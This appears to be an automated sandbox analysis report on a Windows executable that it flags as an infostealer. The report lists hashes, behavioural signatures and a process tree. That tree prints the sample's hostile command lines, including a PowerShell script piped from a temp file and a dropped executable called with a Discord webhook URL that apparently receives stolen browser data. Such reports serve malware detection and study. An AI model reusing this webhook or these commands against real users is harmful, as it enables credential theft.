Resubmissions

20-02-2022 18:04

220220-wnqp3sbeh6 8

Analysis

  • max time kernel
    130s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    20-02-2022 18:04

General

  • Target

    Fruit_of_the_ace_v3.11.99.exe

  • Size

    37.7MB

  • MD5

    4f709e1c6951bbd65d03a9f44961e0ae

  • SHA1

    b228bc6e3572f714ace26b19b9383691684e18f2

  • SHA256

    f266a09389e628b992560b33d50f91f022a89976cc80fa580cf780c40a74c9fa

  • SHA512

    e1a67c87bbde1b7615d3d8321734d9d4ad7a3a626b8912b27b28f4c2c85ddf85162edc62b40b7cf9377936c2d90b63a9b676a546a1ce50417e4ec32460802e7d

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Detects Pyinstaller 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fruit_of_the_ace_v3.11.99.exe
    "C:\Users\Admin\AppData\Local\Temp\Fruit_of_the_ace_v3.11.99.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        3⤵
        PID:1676
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2700
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykbsf0td\ykbsf0td.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5040.tmp" "c:\Users\Admin\AppData\Local\Temp\ykbsf0td\CSCA9DC94F555734AE583938D65AC21D0AE.TMP"
            5⤵
            PID:4780
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
    • C:\Users\Admin\AppData\Local\Temp\MachineMania.exe
      C:\Users\Admin\AppData\Local\Temp\MachineMania https://discord.com/api/webhooks/940902339060072489/yR-laY_d1Jvj71Aayi0ZOb70hoYmLALtc5KZSoa1OMQAJ3B9NCFeqF_17fcQ1baqmCnA
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Users\Admin\AppData\Local\Temp\MachineMania.exe
        C:\Users\Admin\AppData\Local\Temp\MachineMania https://discord.com/api/webhooks/940902339060072489/yR-laY_d1Jvj71Aayi0ZOb70hoYmLALtc5KZSoa1OMQAJ3B9NCFeqF_17fcQ1baqmCnA
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:408
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "ver"
          4⤵
          PID:2232
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:3684

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2700-135-0x0000024E4CDA3000-0x0000024E4CDA5000-memory.dmp (Filesize: 8KB)
  • memory/2700-134-0x0000024E4CDA0000-0x0000024E4CDA2000-memory.dmp (Filesize: 8KB)
  • memory/2700-133-0x00007FFE82473000-0x00007FFE82475000-memory.dmp (Filesize: 8KB)
  • memory/2700-132-0x0000024E4CD70000-0x0000024E4CD92000-memory.dmp (Filesize: 136KB)
  • memory/2700-136-0x0000024E4CDA6000-0x0000024E4CDA8000-memory.dmp (Filesize: 8KB)
  • memory/2700-138-0x0000024E4D560000-0x0000024E4D5D6000-memory.dmp (Filesize: 472KB)
  • memory/2700-137-0x0000024E4D0E0000-0x0000024E4D124000-memory.dmp (Filesize: 272KB)
  • memory/3684-145-0x000002996C280000-0x000002996C290000-memory.dmp (Filesize: 64KB)
  • memory/3684-146-0x000002996E950000-0x000002996E954000-memory.dmp (Filesize: 16KB)
  • memory/3684-144-0x000002996C220000-0x000002996C230000-memory.dmp (Filesize: 64KB)
  • memory/4708-130-0x0000021655400000-0x0000021655401000-memory.dmp (Filesize: 4KB)